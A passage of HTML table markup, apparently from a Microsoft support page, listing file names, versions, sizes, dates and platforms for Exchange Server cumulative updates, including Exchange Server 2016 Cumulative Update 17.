applicable</td></tr><tr><td>Setmailpublicfolderexternaladdress.ps1</td><td>Not applicable</td><td>20,742</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Settingsadapter.dll</td><td>15.2.595.6</td><td>116,096</td><td>12-Aug-2020</td><td>20:41</td><td>x64</td></tr><tr><td>Setup.exe</td><td>15.2.595.6</td><td>20,352</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Setupui.exe</td><td>15.2.595.6</td><td>188,288</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Split_publicfoldermailbox.ps1</td><td>Not applicable</td><td>52,177</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Startdagservermaintenance.ps1</td><td>Not applicable</td><td>27,851</td><td>12-Aug-2020</td><td>20:41</td><td>Not applicable</td></tr><tr><td>Statisticsutil.dll</td><td>15.2.595.6</td><td>142,208</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Stopdagservermaintenance.ps1</td><td>Not applicable</td><td>21,137</td><td>12-Aug-2020</td><td>20:41</td><td>Not applicable</td></tr><tr><td>Storetsconstants.ps1</td><td>Not applicable</td><td>15,834</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Storetslibrary.ps1</td><td>Not applicable</td><td>28,007</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Store_mapi_net_bin_perf_x64_exrpcperf.dll</td><td>15.2.595.6</td><td>28,552</td><td>12-Aug-2020</td><td>20:45</td><td>x64</td></tr><tr><td>Sync_mailpublicfolders.ps1</td><td>Not applicable</td><td>43,915</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Sync_modernmailpublicfolders.ps1</td><td>Not applicable</td><td>43,961</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Textconversionmodule.dll</td><td>15.2.595.6</td><td>86,400</td><td>12-Aug-2020</td><td>20:43</td><td>x64</td></tr><tr><td>Troubleshoot_ci.ps1</td><td>Not applicable</td><td>22,731</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Troubleshoot_databaselatency.ps1</td><td>Not applicable</td><td>33,421</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Troubleshoot_databasespace.ps1</td><td>Not applicable</td><td>30,033</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Uninstall_antispamagents.ps1</td><td>Not applicable</td><td>15,461</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Updateapppoolmanagedframeworkversion.ps1</td><td>Not applicable</td><td>14,018</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Updatecas.ps1</td><td>Not applicable</td><td>35,786</td><td>12-Aug-2020</td><td>20:41</td><td>Not applicable</td></tr><tr><td>Updateconfigfiles.ps1</td><td>Not applicable</td><td>19,730</td><td>12-Aug-2020</td><td>20:41</td><td>Not applicable</td></tr><tr><td>Updateserver.exe</td><td>15.2.595.6</td><td>3,014,528</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Update_malwarefilteringserver.ps1</td><td>Not applicable</td><td>18,144</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Web.config_053c31bdd6824e95b35d61b0a5e7b62d</td><td>Not applicable</td><td>31,813</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Wsbexchange.exe</td><td>15.2.595.6</td><td>125,320</td><td>12-Aug-2020</td><td>20:41</td><td>x64</td></tr><tr><td>X400prox.dll</td><td>15.2.595.6</td><td>103,296</td><td>12-Aug-2020</td><td>20:43</td><td>x64</td></tr><tr><td>_search.lingoperators.a</td><td>15.2.595.6</td><td>34,688</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>_search.lingoperators.b</td><td>15.2.595.6</td><td>34,688</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>_search.mailboxoperators.a</td><td>15.2.595.6</td><td>290,176</td><td>12-Aug-2020</td><td>20:41</td><td>Not applicable</td></tr><tr><td>_search.mailboxoperators.b</td><td>15.2.595.6</td><td>290,176</td><td>12-Aug-2020</td><td>20:41</td><td>Not applicable</td></tr><tr><td>_search.operatorschema.a</td><td>15.2.595.6</td><td>485,768</td><td>12-Aug-2020</td><td>20:41</td><td>Not applicable</td></tr><tr><td>_search.operatorschema.b</td><td>15.2.595.6</td><td>485,768</td><td>12-Aug-2020</td><td>20:41</td><td>Not applicable</td></tr><tr><td>_search.tokenoperators.a</td><td>15.2.595.6</td><td>113,536</td><td>12-Aug-2020</td><td>20:41</td><td>Not applicable</td></tr><tr><td>_search.tokenoperators.b</td><td>15.2.595.6</td><td>113,536</td><td>12-Aug-2020</td><td>20:41</td><td>Not applicable</td></tr><tr><td>_search.transportoperators.a</td><td>15.2.595.6</td><td>67,968</td><td>12-Aug-2020</td><td>20:41</td><td>Not applicable</td></tr><tr><td>_search.transportoperators.b</td><td>15.2.595.6</td><td>67,968</td><td>12-Aug-2020</td><td>20:41</td><td>Not applicable</td></tr></tbody></table></div></div></div><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\">Exchange Server 2016 Cumulative Update 17</span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><table class=\"table\"><tbody><tr><th>File name</th><th>File version</th><th>File size</th><th>Date</th><th>Time</th><th>Platform</th></tr><tr><td>Activemonitoringeventmsg.dll</td><td>15.1.2044.6</td><td>71,048</td><td>12-Aug-2020</td><td>20:11</td><td>x64</td></tr><tr><td>Activemonitoringexecutionlibrary.ps1</td><td>Not applicable</td><td>29,522</td><td>12-Aug-2020</td><td>20:14</td><td>Not applicable</td></tr><tr><td>Adduserstopfrecursive.ps1</td><td>Not applicable</td><td>14,945</td><td>12-Aug-2020</td><td>20:14</td><td>Not applicable</td></tr><tr><td>Ademodule.dll</td><td>15.1.2044.6</td><td>106,368</td><td>12-Aug-2020</td><td>20:10</td><td>x64</td></tr><tr><td>Airfilter.dll</td><td>15.1.2044.6</td><td>42,872</td><td>12-Aug-2020</td><td>20:12</td><td>x64</td></tr><tr><td>Ajaxcontroltoolkit.dll</td><td>15.1.2044.6</td><td>92,552</td><td>12-Aug-2020</td><td>20:14</td><td>x86</td></tr><tr><td>Antispamcommon.ps1</td><td>Not applicable</td><td>13,489</td><td>12-Aug-2020</td><td>20:10</td><td>Not applicable</td></tr><tr><td>Asdat.msi</td><td>Not applicable</td><td>5,087,232</td><td>12-Aug-2020</td><td>20:14</td><td>Not applicable</td></tr><tr><td>Asentirs.msi</td><td>Not applicable</td><td>77,824</td><td>12-Aug-2020</td><td>20:14</td><td>Not applicable</td></tr><tr><td>Asentsig.msi</td><td>Not applicable</td><td>73,728</td><td>12-Aug-2020</td><td>20:14</td><td>Not applicable</td></tr><tr><td>Bigfunnel.bondtypes.dll</td><td>15.1.2044.6</td><td>43,904</td><td>12-Aug-2020</td><td>20:13</td><td>x86</td></tr><tr><td>Bigfunnel.common.dll</td><td>15.1.2044.6</td><td>63,872</td><td>12-Aug-2020</td><td>20:15</td><td>x86</td></tr><tr><td>Bigfunnel.configuration.dll</td><td>15.1.2044.6</td><td>99,200</td><td>12-Aug-2020</td><td>20:15</td><td>x86</td></tr><tr><td>Bigfunnel.entropy.dll</td><td>15.1.2044.6</td><td>44,424</td><td>12-Aug-2020</td><td>20:12</td><td>x86</td></tr><tr><td>Bigfunnel.filter.dll</td><td>15.1.2044.6</td><td>54,144</td><td>12-Aug-2020</td><td>20:14</td><td>x86</td></tr><tr><td>Bigfunnel.indexstream.dll</td><td>15.1.2044.6</td><td>54,136</td><td>12-Aug-2020</td><td>20:15</td><td>x86</td></tr><tr><td>Bigfunnel.poi.dll</td><td>15.1.2044.6</td><td>203,648</td><td>12-Aug-2020</td><td>20:15</td><td>x86</td></tr><tr><td>Bigfunnel.postinglist.dll</td><td>15.1.2044.6</td><td>122,248</td><td>12-Aug-2020</td><td>20:15</td><td>x86</td></tr><tr><td>Bigfunnel.query.dll</td><td>15.1.2044.6</td><td>99,712</td><td>12-Aug-2020</td><td>20:14</td><td>x86</td></tr><tr><td>Bigfunnel.ranking.dll</td><td>15.1.2044.6</td><td>79,232</td><td>12-Aug-2020</td><td>20:15</td><td>x86</td></tr><tr><td>Bigfunnel.syntheticdatalib.dll</td><td>15.1.2044.6</td><td>3,634,560</td><td>12-Aug-2020</td><td>20:15</td><td>x86</td></tr><tr><td>Bigfunnel.wordbreakers.dll</td><td>15.1.2044.6</td><td>46,472</td><td>12-Aug-2020</td><td>20:15</td><td>x86</td></tr><tr><td>Cafe_airfilter_dll</td><td>15.1.2044.6</td><td>42,872</td><td>12-Aug-2020</td><td>20:12</td><td>x64</td></tr><tr><td>Cafe_exppw_dll</td><td>15.1.2044.6</td><td>83,328</td><td>12-Aug-2020</td><td>20:13</td><td>x64</td></tr><tr><td>Cafe_owaauth_dll</td><td>15.1.2044.6</td><td>92,040</td><td>12-Aug-2020</td><td>20:12</td><td>x64</td></tr><tr><td>Calcalculation.ps1</td><td>Not applicable</td><td>42,097</td><td>12-Aug-2020</td><td>20:15</td><td>Not applicable</td></tr><tr><td>Checkdatabaseredundancy.ps1</td><td>Not applicable</td><td>94,606</td><td>12-Aug-2020</td><td>20:10</td><td>Not applicable</td></tr><tr><td>Chksgfiles.dll</td><td>15.1.2044.6</td><td>57,224</td><td>12-Aug-2020</td><td>20:15</td><td>x64</td></tr><tr><td>Citsconstants.ps1</td><td>Not applicable</td><td>15,805</td><td>12-Aug-2020</td><td>20:10</td><td>Not applicable</td></tr><tr><td>Citslibrary.ps1</td><td>Not applicable</td><td>82,664</td><td>12-Aug-2020</td><td>20:10</td><td>Not applicable</td></tr><tr><td>Citstypes.ps1</td><td>Not applicable</td><td>14,464</td><td>12-Aug-2020</td><td>20:10</td><td>Not applicable</td></tr><tr><td>Classificationengine_mce</td><td>15.1.2044.6</td><td>1,693,056</td><td>12-Aug-2020</td><td>20:10</td><td>Not applicable</td></tr><tr><td>Clusmsg.dll</td><td>15.1.2044.6</td><td>134,016</td><td>12-Aug-2020</td><td>20:15</td><td>x64</td></tr><tr><td>Coconet.dll</td><td>15.1.2044.6</td><td>48,000</td><td>12-Aug-2020</td><td>20:11</td><td>x64</td></tr><tr><td>Collectovermetrics.ps1</td><td>Not applicable</td><td>81,644</td><td>12-Aug-2020</td><td>20:10</td><td>Not applicable</td></tr><tr><td>Collectreplicationmetrics.ps1</td><td>Not applicable</td><td>41,870</td><td>12-Aug-2020</td><td>20:10</td><td>Not applicable</td></tr><tr><td>Commonconnectfunctions.ps1</td><td>Not applicable</td><td>29,947</td><td>12-Aug-2020</td><td>20:11</td><td>Not applicable</td></tr><tr><td>Complianceauditservice.exe</td><td>15.1.2044.6</td><td>39,808</td><td>12-Aug-2020</td><td>20:15</td><td>x86</td></tr><tr><td>Configureadam.ps1</td><td>Not applicable</td><td>22,780</td><td>12-Aug-2020</td><td>20:14</td><td>Not applicable</td></tr><tr><td>Configurecaferesponseheaders.ps1</td><td>Not applicable</td><td>20,324</td><td>12-Aug-2020</td><td>20:14</td><td>Not applicable</td></tr><tr><td>Configurenetworkprotocolparameters.ps1</td><td>Not applicable</td><td>19,786</td><td>12-Aug-2020</td><td>20:14</td><td>Not applicable</td></tr><tr><td>Configuresmbipsec.ps1</td><td>Not applicable</td><td>39,844</td><td>12-Aug-2020</td><td>20:14</td><td>Not applicable</td></tr><tr><td>Configure_enterprisepartnerapplication.ps1</td><td>Not applicable</td><td>22,299</td><td>12-Aug-2020</td><td>20:14</td><td>Not applicable</td></tr><tr><td>Connectfunctions.ps1</td><td>Not applicable</td><td>37,141</td><td>12-Aug-2020</td><td>20:15</td><td>Not applicable</td></tr><tr><td>Connect_exchangeserver_help.xml</td><td>Not applicable</td><td>29,600</td><td>12-Aug-2020</td><td>20:15</td><td>Not applicable</td></tr><tr><td>Consoleinitialize.ps1</td><td>Not applicable</td><td>24,232</td><td>12-Aug-2020</td><td>20:13</td><td>Not applicable</td></tr><tr><td>Convertoabvdir.ps1</td><td>Not applicable</td><td>20,069</td><td>12-Aug-2020</td><td>20:14</td><td>Not applicable</td></tr><tr><td>Converttomessagelatency.ps1</td><td>Not applicable</td><td>14,548</td><td>12-Aug-2020</td><td>20:14</td><td>Not applicable</td></tr><tr><td>Convert_distributiongrouptounifiedgroup.ps1</td><td>Not applicable</td><td>34,781</td><td>12-Aug-2020</td><td>20:14</td><td>Not applicable</td></tr><tr><td>Create_publicfoldermailboxesformigration.ps1</td><td>Not applicable</td><td>27,928</td><td>12-Aug-2020</td><td>20:14</td><td>Not applicable</td></tr><tr><td>Cts.14.0.microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not applicable</td><td>502</td><td>12-Aug-2020</td><td>16:10</td><td>Not applicable</td></tr><tr><td>Cts.14.1.microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not applicable</td><td>502</td><td>12-Aug-2020</td><td>16:10</td><td>Not applicable</td></tr><tr><td>Cts.14.2.microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not applicable</td><td>502</td><td>12-Aug-2020</td><td>16:10</td><td>Not applicable</td></tr><tr><td>Cts.14.3.microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not applicable</td><td>502</td><td>12-Aug-2020</td><td>16:10</td><td>Not applicable</td></tr><tr><td>Cts.14.4.microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not applicable</td><td>502</td><td>12-Aug-2020</td><td>16:10</td><td>Not applicable</td></tr><tr><td>Cts.15.0.microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not applicable</td><td>502</td><td>12-Aug-2020</td><td>16:10</td><td>Not applicable</td></tr><tr><td>Cts.15.1.microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not applicable</td><td>502</td><td>12-Aug-2020</td><td>16:10</td><td>Not applicable</td></tr><tr><td>Cts.15.2.microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not applicable</td><td>502</td><td>12-Aug-2020</td><td>16:10</td><td>Not applicable</td></tr><tr><td>Cts.15.20.microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not applicable</td><td>502</td><td>12-Aug-2020</td><td>16:10</td><td>Not applicable</td></tr><tr><td>Cts.8.1.microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not applicable</td><td>502</td><td>12-Aug-2020</td><td>16:10</td><td>Not applicable</td></tr><tr><td>Cts.8.2.microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not applicable</td><td>502</td><td>12-Aug-2020</td><td>16:10</td><td>Not applicable</td></tr><tr><td>Cts.8.3.microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not applicable</td><td>502</td><td>12-Aug-2020</td><td>16:10</td><td>Not applicable</td></tr><tr><td>Cts_exsmime.dll</td><td>15.1.2044.6</td><td>380,800</td><td>12-Aug-2020</td><td>20:14</td><td>x64</td></tr><tr><td>Cts_microsoft.exchange.data.common.dll</td><td>15.1.2044.6</td><td>1,686,912</td><td>12-Aug-2020</td><td>20:12</td><td>x86</td></tr><tr><td>Cts_microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not applicable</td><td>502</td><td>12-Aug-2020</td><td>16:10</td><td>Not applicable</td></tr><tr><td>Cts_policy.14.0.microsoft.exchange.data.common.dll</td><td>15.1.2044.6</td><td>12,672</td><td>12-Aug-2020</td><td>20:11</td><td>x86</td></tr><tr><td>Cts_policy.14.1.microsoft.exchange.data.common.dll</td><td>15.1.2044.6</td><td>12,672</td><td>12-Aug-2020</td><td>20:11</td><td>x86</td></tr><tr><td>Cts_policy.14.2.microsoft.exchange.data.common.dll</td><td>15.1.2044.6</td><td>12,672</td><td>12-Aug-2020</td><td>20:11</td><td>x86</td></tr><tr><td>Cts_policy.14.3.microsoft.exchange.data.common.dll</td><td>15.1.2044.6</td><td>12,680</td><td>12-Aug-2020</td><td>20:11</td><td>x86</td></tr><tr><td>Cts_policy.14.4.microsoft.exchange.data.common.dll</td><td>15.1.2044.6</td><td>12,680</td><td>12-Aug-2020</td><td>20:11</td><td>x86</td></tr><tr><td>Cts_policy.15.0.microsoft.exchange.data.common.dll</td><td>15.1.2044.6</td><td>12,680</td><td>12-Aug-2020</td><td>20:11</td><td>x86</td></tr><tr><td>Cts_policy.15.1.microsoft.exchange.data.common.dll</td><td>15.1.2044.6</td><td>12,672</td><td>12-Aug-2020</td><td>20:11</td><td>x86</td></tr><tr><td>Cts_policy.15.2.microsoft.exchange.data.common.dll</td><td>15.1.2044.6</td><td>12,672</td><td>12-Aug-2020</td><td>20:11</td><td>x86</td></tr><tr><td>Cts_policy.15.20.microsoft.exchange.data.common.dll</td><td>15.1.2044.6</td><td>12,680</td><td>12-Aug-2020</td><td>20:12</td><td>x86</td></tr><tr><td>Cts_policy.8.0.microsoft.exchange.data.common.dll</td><td>15.1.2044.6</td><td>12,664</td><td>12-Aug-2020</td><td>20:11</td><td>x86</td></tr><tr><td>Cts_policy.8.1.microsoft.exchange.data.common.dll</td><td>15.1.2044.6</td><td>12,664</td><td>12-Aug-2020</td><td>20:11</td><td>x86</td></tr><tr><td>Cts_policy.8.2.microsoft.exchange.data.common.dll</td><td>15.1.2044.6</td><td>12,680</td><td>12-Aug-2020</td><td>20:11</td><td>x86</td></tr><tr><td>Cts_policy.8.3.microsoft.exchange.data.common.dll</td><td>15.1.2044.6</td><td>12,672</td><td>12-Aug-2020</td><td>20:11</td><td>x86</td></tr><tr><td>Dagcommonlibrary.ps1</td><td>Not applicable</td><td>60,242</td><td>12-Aug-2020</td><td>20:10</td><td>Not applicable</td></tr><tr><td>Dependentassemblygenerator.exe</td><td>15.1.2044.6</td><td>22,400</td><td>12-Aug-2020</td><td>20:15</td><td>x86</td></tr><tr><td>Diaghelper.dll</td><td>15.1.2044.6</td><td>66,936</td><td>12-Aug-2020</td><td>20:10</td><td>x86</td></tr><tr><td>Diagnosticscriptcommonlibrary.ps1</td><td>Not applicable</td><td>16,334</td><td>12-Aug-2020</td><td>20:10</td><td>Not applicable</td></tr><tr><td>Disableinmemorytracing.ps1</td><td>Not applicable</td><td>13,378</td><td>12-Aug-2020</td><td>20:14</td><td>Not applicable</td></tr><tr><td>Disable_antimalwarescanning.ps1</td><td>Not applicable</td><td>15,201</td><td>12-Aug-2020</td><td>20:14</td><td>Not applicable</td></tr><tr><td>Disable_outsidein.ps1</td><td>Not applicable</td><td>13,670</td><td>12-Aug-2020</td><td>20:14</td><td>Not applicable</td></tr><tr><td>Disklockerapi.dll</td><td>Not applicable</td><td>22,400</td><td>12-Aug-2020</td><td>20:15</td><td>x64</td></tr><tr><td>Dlmigrationmodule.psm1</td><td>Not applicable</td><td>39,596</td><td>12-Aug-2020</td><td>20:14</td><td>Not applicable</td></tr><tr><td>Dsaccessperf.dll</td><td>15.1.2044.6</td><td>45,952</td><td>12-Aug-2020</td